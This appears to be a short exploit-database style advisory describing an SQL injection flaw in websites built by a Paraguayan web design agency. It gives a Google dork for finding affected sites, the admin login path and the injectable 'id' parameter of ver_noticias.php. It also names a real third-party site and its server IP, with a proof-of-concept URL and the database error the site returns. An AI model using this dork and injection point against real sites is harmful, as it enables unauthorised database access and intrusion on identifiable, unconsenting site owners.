Diseño y Desarrollo Creadores Agencia Paraguay SQL Injection

1. ##############################################################
2.  
3. # Exploit Title : Diseño y Desarrollo Creadores Agencia Paraguay SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 11/01/2019
7. # Vendor Homepage : creadores.com.py
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Diseño y Desarrollo: Creadores" site:py
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14.  
15. ##############################################################
16.  
17. # Admin Panel Login Path :
18. *************************
19. /admin/
20.  
21. # SQL Injection Exploit :
22. ***********************
23.  
24. /ver_noticias.php?id=[SQL Injection]
25.  
26. ##############################################################
27.  
28. # Example Vulnerable Site :
29. *************************
30.  
31. Note => (216.172.165.117) => There are 13 domains hosted on this server.
32.  
33. [+] gildaarrua.com/ver_noticias.php?id=43%27 =>
34.  
35. [ Proof of Concept ] => archive.fo/eAWS2
36.  
37. ##############################################################
38.  
39. # SQL Database Error :
40. **********************
41. Warning: mysqli_fetch_array() expects parameter 1
42. to be mysqli_result, boolean given in /home/gildaarrua
43. /public_html/ver_noticias.php on line 82
44.  
45. ##############################################################
46.  
47. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
48.  
49. ##############################################################